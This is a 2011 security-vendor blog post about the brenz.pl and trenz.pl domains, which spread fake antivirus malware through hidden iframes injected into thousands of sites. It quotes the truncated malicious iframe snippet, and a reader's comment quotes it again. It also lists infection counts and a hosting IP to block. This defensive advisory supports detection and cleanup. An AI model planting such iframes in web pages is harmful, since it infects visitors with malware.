Brenz.pl is Back With Malicious iFrames

  • March 5, 2011

We used to see brenz.pl being used to distribute malware back in 2009, and got shut down. However, for the last few weeks we noticed a big increase in the number of sites infected with iframes pointing to it.

All the sites infected have this iframe (or very similar):

<iframe style="height:1px" src="http://www.Brenz.pl/rc/” frameborder=0 wid..

Which redirects the user to another sites to download the unfamous Fake AV. How many sites got infected? According to Google at least 2 thousand sites got hacked in the last 90 days:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1932 domain(s), including luragung.web.id/, computing.net/, puntlandpost.com/.

And under the same “management”, there is a domain called trenz.pl, which infected more than 1k sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 826 domain(s), including rs.gov.br/, darululoom-deoband.com/, upi.edu/.

Both sites are hosted on 91.188.59.197. So, one more IP address to block in your firewalls 🙂

If your site is currently hacked/infected, contact us to get it cleaned up and secured.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
2 comments
  1. Pingback: IT Secure Site » Brenz.pl is back with malicious iframes

  2. pourquoi moi sur mon ordinateur système Windows XP , à chaque fois que j’enregistre un fichier .html, et je le reouvre: je vois marquer sur mon bloc-notes en bas :<iframe style="height:1px" src="http://www.Brenz.pl/rc/&quot; frameborder=0 width=1 ?????mon ordinateur est aussi infecter!!!???et d’abord il n’y a pas de réseau?????

Comments are closed.

Related Categories
You May Also Like